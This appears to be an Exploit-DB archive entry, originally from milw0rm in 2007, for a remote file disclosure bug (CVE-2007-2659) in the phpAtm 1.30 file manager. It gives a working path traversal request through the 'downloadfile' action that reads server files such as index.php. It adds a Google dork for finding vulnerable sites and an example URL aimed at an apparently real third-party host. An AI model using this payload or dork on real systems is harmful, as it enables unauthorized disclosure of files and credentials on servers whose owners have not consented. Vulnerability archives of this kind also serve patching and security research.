[] NeoSense

phpAtm 1.30 - 'downloadfile' Remote File Disclosure

Author: Ali.Mohajem
type: webapps
platform: php
port: 
date_added: 2007-05-12 
date_updated: 2016-10-05 
verified: 1 
codes: OSVDB-41990;CVE-2007-2659 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comphpATM_130.zip

******************************************************************************************
download page in : http://phpatm.free.fr/

bug in : phpatm
injection attack :
 index.php?action=downloadfile&filename=index.php&directory=../&

Dork in google : "powered by php advanced transfer manager"

example : http://www.furytech.net/phpATM_130/index.php?action=downloadfile&filename=index.php&directory=../
*******************************************************************************************
************************************************************************************
found bug by : Ali.Mohajem
Email : Ali.Mohajem@Yahoo.com
Website : wWw.Shayatin-team.com
www.mohajem.net
www.mohajem.org
special tnx : fireman - dr.trojan-L0rd-Samir-s4rem-and all iranian hackers
*************************************************************************************

# milw0rm.com [2007-05-13]